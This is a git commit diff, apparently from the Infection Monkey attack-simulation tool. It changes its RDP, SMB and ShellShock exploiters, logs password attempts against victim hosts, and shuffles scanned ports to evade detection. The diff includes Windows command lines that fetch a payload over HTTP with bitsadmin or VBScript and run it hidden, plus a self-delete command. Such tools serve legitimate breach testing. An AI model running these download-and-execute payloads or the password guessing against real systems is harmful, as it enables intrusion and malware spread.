Merge remote-tracking branch 'origin/master'

This commit is contained in:
daniel goldberg 2016-09-08 10:21:47 +03:00
commit 6fcf8b2f15
9 changed files with 32 additions and 8 deletions

View File

@ -208,6 +208,8 @@ class Configuration(object):
# smb/wmi exploiter
smb_download_timeout = 300 # timeout in seconds
smb_service_name = "InfectionMonkey"
# system info collection
collect_system_info = True

View File

@ -66,6 +66,7 @@
"range_size": 30,
"rdp_use_vbs_download": true,
"smb_download_timeout": 300,
"smb_service_name": "InfectionMonkey",
"retry_failed_explotation": true,
"scanner_class": "TcpScanner",
"self_delete_in_cleanup": true,

View File

@ -103,6 +103,7 @@ class KeyPressRDPClient(rdp.RDPClientObserver):
self._update_lock.release()
def _keysSender(self):
LOG.debug("Starting to send keystrokes")
while True:
if self.closed:
@ -260,6 +261,8 @@ class RdpExploiter(HostExploiter):
LOG.debug("Exploiter RdpGrinder failed, http transfer creation failed.")
return False
LOG.info("Started http server on %s", http_path)
cmdline = build_monkey_commandline(host, depth-1)
if self._config.rdp_use_vbs_download:
@ -286,9 +289,11 @@ class RdpExploiter(HostExploiter):
for password in passwords:
try:
# run command using rdp.
LOG.info("Trying rdp logging into victim %r with user %s and password '%s'",
LOG.info("Trying RDP logging into victim %r with user %s and password '%s'",
host, self._config.psexec_user, password)
LOG.info("RDP logged in to %r", host)
client_factory = CMDClientFactory(self._config.psexec_user, password, "", command)
reactor.callFromThread(reactor.connectTCP, host.ip_addr, RDP_PORT, client_factory)

View File

@ -92,7 +92,6 @@ class ShellShockExploiter(HostExploiter):
LOG.debug("Error running uname machine commad on victim %r: (%s)", host, exc)
return False
# copy the monkey
dropper_target_path_linux = self._config.dropper_target_path_linux
if self.skip_exist and (self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
@ -193,7 +192,7 @@ class ShellShockExploiter(HostExploiter):
Checks if which urls exist
:return: Sequence of URLs to try and attack
"""
import grequests
import grequests # at this point, it monkey patches half the world and we must stop it
attack_path = 'http://'
if is_https:
attack_path = 'https://'
@ -203,6 +202,10 @@ class ShellShockExploiter(HostExploiter):
resps = grequests.map(reqs, size=15)
valid_resps = [resp for resp in resps if resp and resp.status_code == requests.codes.ok]
urls = [resp.url for resp in valid_resps]
# revert monkey patch
import socket # this is the monkeypatched socket module
reload(socket)
return urls
@staticmethod

View File

@ -141,7 +141,7 @@ class SmbExploiter(HostExploiter):
sc_handle = resp['lpScHandle']
# start the monkey using the SCM
resp = scmr.hRCreateServiceW(scmr_rpc, sc_handle, "Chaos Monkey", "Chaos Monkey",
resp = scmr.hRCreateServiceW(scmr_rpc, sc_handle, self._config.smb_service_name, self._config.smb_service_name,
lpBinaryPathName=cmdline)
service = resp['lpServiceHandle']

View File

@ -10,5 +10,5 @@ DROPPER_CMDLINE_DETACHED = 'cmd /c start cmd /c %%(dropper_path)s %s' % (DROPPER
MONKEY_CMDLINE_DETACHED = 'cmd /c start cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, )
MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd /c %%(monkey_path)s %s"' % (MONKEY_ARG, )
RDP_CMDLINE_HTTP_BITS = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %s %%(parameters)s' % (MONKEY_ARG, )
RDP_CMDLINE_HTTP_VBS = 'set o=!TMP!\!RANDOM!.tmp&@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>!o!&@echo objXMLHTTP.open "GET","%%(http_path)s",false>>!o!&@echo objXMLHTTP.send()>>!o!&@echo If objXMLHTTP.Status=200 Then>>!o!&@echo Set objADOStream=CreateObject("ADODB.Stream")>>!o!&@echo objADOStream.Open>>!o!&@echo objADOStream.Type=1 >>!o!&@echo objADOStream.Write objXMLHTTP.ResponseBody>>!o!&@echo objADOStream.Position=0 >>!o!&@echo objADOStream.SaveToFile "%%(monkey_path)s">>!o!&@echo objADOStream.Close>>!o!&@echo Set objADOStream=Nothing>>!o!&@echo End if>>!o!&@echo Set objXMLHTTP=Nothing>>!o!&@echo Set objShell=CreateObject("WScript.Shell")>>!o!&@echo objShell.Run "%%(monkey_path)s %s %%(parameters)s", 0, false>>!o!&start /b cmd /c cscript.exe //E:vbscript !o!^&del /f /q !o!' % (MONKEY_ARG, )
RDP_CMDLINE_HTTP_VBS = 'set o=!TMP!\!RANDOM!.tmp&@echo Set objXMLHTTP=CreateObject("WinHttp.WinHttpRequest.5.1")>!o!&@echo objXMLHTTP.open "GET","%%(http_path)s",false>>!o!&@echo objXMLHTTP.send()>>!o!&@echo If objXMLHTTP.Status=200 Then>>!o!&@echo Set objADOStream=CreateObject("ADODB.Stream")>>!o!&@echo objADOStream.Open>>!o!&@echo objADOStream.Type=1 >>!o!&@echo objADOStream.Write objXMLHTTP.ResponseBody>>!o!&@echo objADOStream.Position=0 >>!o!&@echo objADOStream.SaveToFile "%%(monkey_path)s">>!o!&@echo objADOStream.Close>>!o!&@echo Set objADOStream=Nothing>>!o!&@echo End if>>!o!&@echo Set objXMLHTTP=Nothing>>!o!&@echo Set objShell=CreateObject("WScript.Shell")>>!o!&@echo objShell.Run "%%(monkey_path)s %s %%(parameters)s", 0, false>>!o!&start /b cmd /c cscript.exe //E:vbscript !o!^&del /f /q !o!' % (MONKEY_ARG, )
DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1'

View File

@ -1,4 +1,5 @@
import time
from random import shuffle
from network import HostScanner, HostFinger
from model.host import VictimHost
from network.tools import check_port_tcp
@ -19,8 +20,11 @@ class TcpScanner(HostScanner, HostFinger):
assert isinstance(host, VictimHost)
count = 0
# maybe hide under really bad detection systems
target_ports = self._config.tcp_target_ports[:]
shuffle(target_ports)
for target_port in self._config.tcp_target_ports:
for target_port in target_ports:
is_open, banner = check_port_tcp(host.ip_addr,
target_port,

View File

@ -315,4 +315,12 @@ api.add_resource(Connector, '/connector')
api.add_resource(JobCreation, '/jobcreate')
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=True, ssl_context=('server.crt', 'server.key'))
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
http_server = HTTPServer(WSGIContainer(app), ssl_options={'certfile': 'server.crt', 'keyfile': 'server.key'})
http_server.listen(5000)
IOLoop.instance().start()
#app.run(host='0.0.0.0', debug=True, ssl_context=('server.crt', 'server.key'))

View File

@ -1,3 +1,4 @@
pyVmomi
celery
celery[mongodb]
tornado